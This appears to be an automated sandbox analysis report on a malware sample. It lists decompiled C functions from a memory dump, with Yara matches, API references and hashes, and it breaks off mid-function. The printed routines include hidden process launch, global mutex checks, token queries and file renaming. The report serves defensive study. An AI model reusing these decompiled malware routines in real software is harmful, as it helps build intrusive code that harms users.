                                                                                                                                                                                                0x00afa08a
                                                                                                                                                                                                0x00afa08d
                                                                                                                                                                                                0x00afa1fc
                                                                                                                                                                                                0x00afa1fc
                                                                                                                                                                                                0x00afa1fc
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa09d
                                                                                                                                                                                                0x00afa09d
                                                                                                                                                                                                0x00afa09f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa0a5
                                                                                                                                                                                                0x00afa0ae
                                                                                                                                                                                                0x00afa0b1
                                                                                                                                                                                                0x00afa0b2
                                                                                                                                                                                                0x00afa0ba
                                                                                                                                                                                                0x00afa0bd
                                                                                                                                                                                                0x00afa0c8
                                                                                                                                                                                                0x00afa0d8
                                                                                                                                                                                                0x00afa0dd
                                                                                                                                                                                                0x00afa0e0
                                                                                                                                                                                                0x00afa0e9
                                                                                                                                                                                                0x00afa0f1
                                                                                                                                                                                                0x00afa0f6
                                                                                                                                                                                                0x00afa0fb
                                                                                                                                                                                                0x00afa108
                                                                                                                                                                                                0x00afa10a
                                                                                                                                                                                                0x00afa111
                                                                                                                                                                                                0x00afa116
                                                                                                                                                                                                0x00afa119
                                                                                                                                                                                                0x00afa121
                                                                                                                                                                                                0x00afa12e
                                                                                                                                                                                                0x00afa133
                                                                                                                                                                                                0x00afa139
                                                                                                                                                                                                0x00afa142
                                                                                                                                                                                                0x00afa148
                                                                                                                                                                                                0x00afa14b
                                                                                                                                                                                                0x00afa14c
                                                                                                                                                                                                0x00afa15e
                                                                                                                                                                                                0x00afa16e
                                                                                                                                                                                                0x00afa17a
                                                                                                                                                                                                0x00afa17f
                                                                                                                                                                                                0x00afa182
                                                                                                                                                                                                0x00afa184
                                                                                                                                                                                                0x00afa18e
                                                                                                                                                                                                0x00afa1a9
                                                                                                                                                                                                0x00afa1ac
                                                                                                                                                                                                0x00afa1ae
                                                                                                                                                                                                0x00afa1c9
                                                                                                                                                                                                0x00afa1cc
                                                                                                                                                                                                0x00afa1ce
                                                                                                                                                                                                0x00afa1d0
                                                                                                                                                                                                0x00afa1d2
                                                                                                                                                                                                0x00afa1d2
                                                                                                                                                                                                0x00afa1db
                                                                                                                                                                                                0x00afa1b0
                                                                                                                                                                                                0x00afa1b0
                                                                                                                                                                                                0x00afa1b2
                                                                                                                                                                                                0x00afa1b2
                                                                                                                                                                                                0x00afa1e4
                                                                                                                                                                                                0x00afa1ea
                                                                                                                                                                                                0x00afa1f1
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa1f8
                                                                                                                                                                                                0x00afa0ff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa0ff

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00B02465: _ftol2_sse.MSVCRT ref: 00B024C6
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 00AFA1A9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeapOpen_ftol2_sse
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3756893521-0
                                                                                                                                                                                                • Opcode ID: 1d392aade176a6e5cae46877d1b51f2b35084c8d029b4bd4ec1925fbf0afaeef
                                                                                                                                                                                                • Instruction ID: 3eb398c865b2084fde3833aa29d68f0a314be19911510c1ac9ee2c4d9cb38fca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d392aade176a6e5cae46877d1b51f2b35084c8d029b4bd4ec1925fbf0afaeef
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516F7290021DABCF11DFE4DC85FEEBBB8AF14320F108266F619A7191EB749645CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA953, Relevance: 4.6, APIs: 3, Instructions: 74processCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                			E00AFA953(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0xb0e684; // 0x4d3f6c8
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}











                                                                                                                                                                                                0x00afa95e
                                                                                                                                                                                                0x00afa967
                                                                                                                                                                                                0x00afa96e
                                                                                                                                                                                                0x00afa976
                                                                                                                                                                                                0x00afa97a
                                                                                                                                                                                                0x00afa97b
                                                                                                                                                                                                0x00afa97c
                                                                                                                                                                                                0x00afa97d
                                                                                                                                                                                                0x00afa97e
                                                                                                                                                                                                0x00afa983
                                                                                                                                                                                                0x00afa987
                                                                                                                                                                                                0x00afa98a
                                                                                                                                                                                                0x00afa98a
                                                                                                                                                                                                0x00afa997
                                                                                                                                                                                                0x00afa9b3
                                                                                                                                                                                                0x00afa9f0
                                                                                                                                                                                                0x00afa9b5
                                                                                                                                                                                                0x00afa9b8
                                                                                                                                                                                                0x00afa9ba
                                                                                                                                                                                                0x00afa9bd
                                                                                                                                                                                                0x00afa9c2
                                                                                                                                                                                                0x00afa9ca
                                                                                                                                                                                                0x00afa9d2
                                                                                                                                                                                                0x00afa9d2
                                                                                                                                                                                                0x00afa9ca
                                                                                                                                                                                                0x00afa9d8
                                                                                                                                                                                                0x00afa9e0
                                                                                                                                                                                                0x00afa9e3
                                                                                                                                                                                                0x00afa9eb
                                                                                                                                                                                                0x00afa9eb
                                                                                                                                                                                                0x00afa9f8

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFA967
                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,00001388,00000000,00000000,00000000,00AFC1ED,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 00AFA9AE
                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 00AFA9D2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$CodeCreateExitmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4170947310-0
                                                                                                                                                                                                • Opcode ID: ce296b5f41538a203e8b69dfab5ef8ac7c5c64d4b63853aa478a59b1fc2ec48e
                                                                                                                                                                                                • Instruction ID: 2b4b0c1771cc2f3bf1e8ff375341a478f8e9f403c610d0e94fc6f64485efd2a6
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce296b5f41538a203e8b69dfab5ef8ac7c5c64d4b63853aa478a59b1fc2ec48e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E2147B2A10119AFDB419FE9DC84EEEBBBCFB28344B014525FA25E6161DA71DC40CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFB9DA, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E00AFB9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00AF85E5(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E00AF85FB( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                                                0x00afb9dd
                                                                                                                                                                                                0x00afb9de
                                                                                                                                                                                                0x00afb9e5
                                                                                                                                                                                                0x00afb9ed
                                                                                                                                                                                                0x00afb9f1
                                                                                                                                                                                                0x00afb9fa
                                                                                                                                                                                                0x00afba40
                                                                                                                                                                                                0x00afba40
                                                                                                                                                                                                0x00afba07
                                                                                                                                                                                                0x00afba0f
                                                                                                                                                                                                0x00afba11
                                                                                                                                                                                                0x00afba17
                                                                                                                                                                                                0x00afba30
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afba32
                                                                                                                                                                                                0x00afba37
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afba3d
                                                                                                                                                                                                0x00afba19
                                                                                                                                                                                                0x00afba19
                                                                                                                                                                                                0x00afba19
                                                                                                                                                                                                0x00afba19
                                                                                                                                                                                                0x00afba17
                                                                                                                                                                                                0x00afba46

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74E5F500,00000000,10000000,00000000,00000000,?,00AFBA79,?,00000000,?,00AFD0EA), ref: 00AFB9F5
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00AFBA79,?,00000000,?,00AFD0EA), ref: 00AFB9FC
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,00AFBA79,?,00000000,?,00AFD0EA), ref: 00AFBA2B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2499131667-0
                                                                                                                                                                                                • Opcode ID: 67468438d72354df090625f5ac519e8db2bc12234980818f71fd98f1082df73b
                                                                                                                                                                                                • Instruction ID: 464435f0e0ba014c328f5bd01c5e98875d7b110865895c108dd38f0a137377d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 67468438d72354df090625f5ac519e8db2bc12234980818f71fd98f1082df73b
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7014F72610118BFCB30ABE5ED49DAB7EBCDB557A0B110565F606D3120EA31DD0096B0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF58FF, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF58FF(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E00AFA501(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xb0e684; // 0x4d3f6c8
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








                                                                                                                                                                                                0x00af5903
                                                                                                                                                                                                0x00af5908
                                                                                                                                                                                                0x00af5914
                                                                                                                                                                                                0x00af5921
                                                                                                                                                                                                0x00af5925
                                                                                                                                                                                                0x00af593d
                                                                                                                                                                                                0x00af595d
                                                                                                                                                                                                0x00af595e
                                                                                                                                                                                                0x00af594d
                                                                                                                                                                                                0x00af594d
                                                                                                                                                                                                0x00af5953
                                                                                                                                                                                                0x00af5953
                                                                                                                                                                                                0x00af5927
                                                                                                                                                                                                0x00af5927
                                                                                                                                                                                                0x00af592d
                                                                                                                                                                                                0x00af592d
                                                                                                                                                                                                0x00af590a
                                                                                                                                                                                                0x00af590a
                                                                                                                                                                                                0x00af590a
                                                                                                                                                                                                0x00af5966

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,00AF59C0,00AF5DB5,Global,00B0BA14,?,00000000,?,00000002), ref: 00AF591B
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00AF59C0,00AF5DB5,Global,00B0BA14,?,00000000,?,00000002), ref: 00AF5927
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1925916568-0
                                                                                                                                                                                                • Opcode ID: 31a943e7bc896bd221406387a0d48fc13c52bdbce8bb2b64d31a838daa9a8213
                                                                                                                                                                                                • Instruction ID: e2f103723260619d294b7a59e4309532561da966f0a9f7faf986eb04197436e1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 31a943e7bc896bd221406387a0d48fc13c52bdbce8bb2b64d31a838daa9a8213
                                                                                                                                                                                                • Instruction Fuzzy Hash: DEF0C831A04419DBCA1807F9D8C497A7AA8EFA5730B620325FB79D72D0CFB08C0543A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA4B3, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA4B3(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E00AFA501(_t17, _t16) < 0) {
						_t8 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






                                                                                                                                                                                                0x00afa4bf
                                                                                                                                                                                                0x00afa4c7
                                                                                                                                                                                                0x00afa4cb
                                                                                                                                                                                                0x00afa4e2
                                                                                                                                                                                                0x00afa4f1
                                                                                                                                                                                                0x00afa4f7
                                                                                                                                                                                                0x00afa4fa
                                                                                                                                                                                                0x00afa4fa
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa4fc
                                                                                                                                                                                                0x00afa4cd
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00AF4E07,00000000), ref: 00AFA4C1
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFA4CD
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFA4D7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$CreateMutex
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 200418032-0
                                                                                                                                                                                                • Opcode ID: 23df5429f30cbefd7468249a87321ed7bce15e179fdce911940477c443a60f6a
                                                                                                                                                                                                • Instruction ID: 12e718748db001a070270b0dca89852d0d96398acdfdc45150f053250b4be67b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23df5429f30cbefd7468249a87321ed7bce15e179fdce911940477c443a60f6a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F02B713001219BC71013A8FC0CFBA36A4AFB4712F024420F60DCB111DEB0CC4083A3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFB054, Relevance: 3.8, APIs: 3, Instructions: 72stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                			E00AFB054(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0xb0e698; // 0x4d3f9a0
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E00AFB988(_t39);
				_t26 =  *0xb0e6b8; // 0x4d3f9b0
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0xb0e688; // 0xb20000
					if(E00AFBBCF( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0xb0e698; // 0x4d3f9a0
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E00AFC3D4( &_v528) * 2, 0x104);
				return 1;
			}
















                                                                                                                                                                                                0x00afb054
                                                                                                                                                                                                0x00afb065
                                                                                                                                                                                                0x00afb077
                                                                                                                                                                                                0x00afb079
                                                                                                                                                                                                0x00afb087
                                                                                                                                                                                                0x00afb096
                                                                                                                                                                                                0x00afb0a1
                                                                                                                                                                                                0x00afb0a9
                                                                                                                                                                                                0x00afb0b6
                                                                                                                                                                                                0x00afb0bc
                                                                                                                                                                                                0x00afb0c0
                                                                                                                                                                                                0x00afb0c2
                                                                                                                                                                                                0x00afb0d6
                                                                                                                                                                                                0x00afb0df
                                                                                                                                                                                                0x00afb0ea
                                                                                                                                                                                                0x00afb0ea
                                                                                                                                                                                                0x00afb0d6
                                                                                                                                                                                                0x00afb0ed
                                                                                                                                                                                                0x00afb0f4
                                                                                                                                                                                                0x00afb112
                                                                                                                                                                                                0x00afb11f

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFB079
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFB087
                                                                                                                                                                                                  • Part of subcall function 00AFB988: GetCurrentThread.KERNEL32 ref: 00AFB99B
                                                                                                                                                                                                  • Part of subcall function 00AFB988: GetLastError.KERNEL32(?,?,00AFBABE,74E5F500,10000000), ref: 00AFB9A9
                                                                                                                                                                                                  • Part of subcall function 00AFB988: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,00AFBABE,74E5F500,10000000), ref: 00AFB9C2
                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 00AFB112
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Currentmemset$ErrorLastProcessThreadlstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4088293216-0
                                                                                                                                                                                                • Opcode ID: 533a5c61ec20644ede22e56ea95be781f491cf754ac7241af9ebe37542b76c6a
                                                                                                                                                                                                • Instruction ID: ce1f8e5597addb93be7d57315c613e8b8862225b2c31a9915c3b1579b0759f36
                                                                                                                                                                                                • Opcode Fuzzy Hash: 533a5c61ec20644ede22e56ea95be781f491cf754ac7241af9ebe37542b76c6a
                                                                                                                                                                                                • Instruction Fuzzy Hash: F921AEB250111CAFE710EBA4DD89EEA77BCEB18304F0045A4F615D7192EB70DE88CB60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF6D81, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                			E00AF6D81(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0xb0e778; // 0x4d3f9f0
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00AF9E9B(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0xb0e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0xb0e688; // 0xb20000
						_t10 = E00AFEE11(_t49 + 0xb0, _t51, _t66);
						 *0xb0e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0xb0e688; // 0xb20000
					_push(L"\\c");
					_t9 = E00AF92C6(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0xb0e688; // 0xb20000
							_t56 = E00AFA4B3(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E00AFB2AB(_t59) == 0) {
								_t32 = E00AFF191(_t59, 0x1388, _t74);
							}
							E00AFA51D(_t56);
							_t41 =  *0xb0e684; // 0x4d3f6c8
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E00AF97ED( &_v544);
								_t43 =  *0xb0e778; // 0x4d3f9f0
								_t53 = 0x33;
								if(E00AF9E9B(_t43, _t53) != 0) {
									L12:
									__eflags = E00AF1C51(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E00AFB1F3(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0xb0e778; // 0x4d3f9f0
									_t53 = 0x12;
									_t22 = E00AF9E9B(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E00AFA531(_t53, _t72) != 0) {
										_push(E00AF97ED(0));
										E00AF9621( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E00AF85FB( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























                                                                                                                                                                                                0x00af6d81
                                                                                                                                                                                                0x00af6d87
                                                                                                                                                                                                0x00af6d8d
                                                                                                                                                                                                0x00af6d9a
                                                                                                                                                                                                0x00af6d9b
                                                                                                                                                                                                0x00af6d9c
                                                                                                                                                                                                0x00af6da3
                                                                                                                                                                                                0x00af6da9
                                                                                                                                                                                                0x00af6dae
                                                                                                                                                                                                0x00af6db0
                                                                                                                                                                                                0x00af6db2
                                                                                                                                                                                                0x00af6dbe
                                                                                                                                                                                                0x00af6dc3
                                                                                                                                                                                                0x00af6dc3
                                                                                                                                                                                                0x00af6dc8
                                                                                                                                                                                                0x00af6dca
                                                                                                                                                                                                0x00af6dcb
                                                                                                                                                                                                0x00af6dd5
                                                                                                                                                                                                0x00af6ddb
                                                                                                                                                                                                0x00af6de0
                                                                                                                                                                                                0x00af6de2
                                                                                                                                                                                                0x00af6de5
                                                                                                                                                                                                0x00af6deb
                                                                                                                                                                                                0x00af6df1
                                                                                                                                                                                                0x00af6df1
                                                                                                                                                                                                0x00af6e07
                                                                                                                                                                                                0x00af6e0b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6e1a
                                                                                                                                                                                                0x00af6e23
                                                                                                                                                                                                0x00af6e23
                                                                                                                                                                                                0x00af6e27
                                                                                                                                                                                                0x00af6e2c
                                                                                                                                                                                                0x00af6e33
                                                                                                                                                                                                0x00af6e38
                                                                                                                                                                                                0x00af6e3e
                                                                                                                                                                                                0x00af6e43
                                                                                                                                                                                                0x00af6e4b
                                                                                                                                                                                                0x00af6e53
                                                                                                                                                                                                0x00af6ea1
                                                                                                                                                                                                0x00af6ea8
                                                                                                                                                                                                0x00af6eaa
                                                                                                                                                                                                0x00af6eae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6eae
                                                                                                                                                                                                0x00af6e55
                                                                                                                                                                                                0x00af6e55
                                                                                                                                                                                                0x00af6e5d
                                                                                                                                                                                                0x00af6e5e
                                                                                                                                                                                                0x00af6e63
                                                                                                                                                                                                0x00af6e65
                                                                                                                                                                                                0x00af6e77
                                                                                                                                                                                                0x00af6e88
                                                                                                                                                                                                0x00af6e8d
                                                                                                                                                                                                0x00af6e96
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6e65
                                                                                                                                                                                                0x00af6e53
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6e38
                                                                                                                                                                                                0x00af6ebf
                                                                                                                                                                                                0x00af6ec5
                                                                                                                                                                                                0x00af6deb
                                                                                                                                                                                                0x00af6ecc

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00AF6E96
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileMove
                                                                                                                                                                                                • String ID: %s.%u
                                                                                                                                                                                                • API String ID: 3562171763-1288070821
                                                                                                                                                                                                • Opcode ID: 3891c58923e11863444e57676516341af98df7c13958fe6260c354b324c7cfcc
                                                                                                                                                                                                • Instruction ID: a352572cb0120686c79d711dc406e906e4e454ffb915d5bde02a72f8c037e6cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3891c58923e11863444e57676516341af98df7c13958fe6260c354b324c7cfcc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31CF323043085BE614FBF5EE56ABF33A99BA4710F500928FB219B2D2EF24D905C752
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF2ADD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E00AF2ADD() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0xb0e710 * 0x64;
				_t39 = 0;
				_v12 =  *0xb0e710 * 0x64;
				_t16 = E00AF85E5(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0xb0e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00AF9F13(0xe); // executed
						E00AF85FB( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0xb0e714; // 0x4d3ff48
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0xb0e714; // 0x4d3ff48
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
